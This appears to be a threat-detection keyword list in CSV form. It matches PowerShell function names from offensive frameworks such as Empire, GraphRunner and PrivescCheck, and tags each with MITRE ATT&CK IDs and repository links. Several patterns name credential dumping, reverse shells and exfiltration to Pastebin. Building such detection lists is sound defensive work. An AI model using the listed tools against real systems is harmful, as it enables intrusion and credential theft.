"*Invoke-RevShellServer.ps1*",".{0,1000}Invoke\-RevShellServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-RIDHijacking*",".{0,1000}Invoke\-RIDHijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*invoke-ridhijacking.py*",".{0,1000}invoke\-ridhijacking\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*Invoke-Rubeus *",".{0,1000}Invoke\-Rubeus\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-Rubeus*",".{0,1000}Invoke\-Rubeus.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-RunAs.ps1*",".{0,1000}Invoke\-RunAs\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows 
computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*Invoke-RunasCs*",".{0,1000}Invoke\-RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*invoke-runaspayload*",".{0,1000}invoke\-runaspayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-RunningProcessCheck*",".{0,1000}Invoke\-RunningProcessCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for 
Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-S3ssionGoph3r*",".{0,1000}Invoke\-S3ssionGoph3r.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-S4U-persistence.ps1*",".{0,1000}Invoke\-S4U\-persistence\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Invoke-SafetyKatz*",".{0,1000}Invoke\-SafetyKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SamBackupFilesCheck*",".{0,1000}Invoke\-SamBackupFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 
- T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-SAMDump*",".{0,1000}Invoke\-SAMDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-SAMDump*",".{0,1000}Invoke\-SAMDump.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-SauronEye*",".{0,1000}Invoke\-SauronEye.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SccmCacheFolderCheck*",".{0,1000}Invoke\-SccmCacheFolderCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ScheduledTasksCheck*",".{0,1000}Invoke\-ScheduledTasksCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ScheduledTasksImagePermissionsCheck*",".{0,1000}Invoke\-ScheduledTasksImagePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ScheduledTasksUnquotedPathCheck*",".{0,1000}Invoke\-ScheduledTasksUnquotedPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SCMPermissionsCheck*",".{0,1000}Invoke\-SCMPermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SCOMDecrypt*",".{0,1000}Invoke\-SCOMDecrypt.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM 
servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*Invoke-ScriptSentry*",".{0,1000}Invoke\-ScriptSentry.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","2","151","16","2024-04-30T13:39:02Z","2023-07-22T03:17:58Z" "*Invoke-SCShell*",".{0,1000}Invoke\-SCShell.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-SDCLTBypass*",".{0,1000}Invoke\-SDCLTBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1130","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-SDPropagator*",".{0,1000}Invoke\-SDPropagator.{0,1000}","offensive_tool_keyword","powershell","propagation of ACL changes on the 'AdminSDHolder' container. which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. 
and forcing ACL changes to propagate may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/theyoge/AD-Pentesting-Tools/blob/main/Invoke-SDPropagator.ps1","1","1","N/A","N/A","1","68","12","2020-12-29T07:57:54Z","2020-10-14T05:01:51Z" "*Invoke-SearchMailbox*",".{0,1000}Invoke\-SearchMailbox.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Has the ability to do deep searches across a user's mailbox and can export messages","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SearchSharePointAndOneDrive*",".{0,1000}Invoke\-SearchSharePointAndOneDrive.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Search across all SharePoint sites and OneDrive drives visible to the user","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SearchTeams -Tokens *",".{0,1000}Invoke\-SearchTeams\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SearchUserAttributes*Search for terms across all user attributes in a directory*",".{0,1000}Invoke\-SearchUserAttributes.{0,1000}Search\sfor\sterms\sacross\sall\suser\sattributes\sin\sa\sdirectory.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph 
API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-Seatbelt*",".{0,1000}Invoke\-Seatbelt.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Seatbelt*",".{0,1000}Invoke\-Seatbelt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-SecretsDump.ps1*",".{0,1000}Invoke\-SecretsDump\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*Invoke-SecurityGroupCloner -Tokens *",".{0,1000}Invoke\-SecurityGroupCloner\s\-Tokens\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SecurityGroupCloner*",".{0,1000}Invoke\-SecurityGroupCloner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Clones a security group while using an identical name and member list but can inject another user as well","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-SendMail -Targets*",".{0,1000}Invoke\-SendMail\s\-Targets.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-SendReverseShell*",".{0,1000}Invoke\-SendReverseShell.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular 
post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-SendToPasteBin*",".{0,1000}Invoke\-SendToPasteBin.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-SensitiveHiveFileAccessCheck*",".{0,1000}Invoke\-SensitiveHiveFileAccessCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-SensitiveHiveShadowCopyCheck*",".{0,1000}Invoke\-SensitiveHiveShadowCopyCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Exploit vulnerable 
service permissions (does not require touching disk)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*Invoke-ServiceAbuse*",".{0,1000}Invoke\-ServiceAbuse.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Service-persistence.ps1*",".{0,1000}Invoke\-Service\-persistence\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Invoke-ServicesImagePermissionsCheck*",".{0,1000}Invoke\-ServicesImagePermissionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ServicesImagePermissionsCheck*",".{0,1000}Invoke\-ServicesImagePermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ServicesPermissionsCheck*",".{0,1000}Invoke\-ServicesPermissionsCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ServicesPermissionsCheck*",".{0,1000}Invoke\-ServicesPermissionsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ServicesPermissionsRegistryCheck*",".{0,1000}Invoke\-ServicesPermissionsRegistryCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ServicesPermissionsRegistryCheck*",".{0,1000}Invoke\-ServicesPermissionsRegistryCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-ServicesUnquotedPathCheck*",".{0,1000}Invoke\-ServicesUnquotedPathCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-ServicesUnquotedPathCheck*",".{0,1000}Invoke\-ServicesUnquotedPathCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" 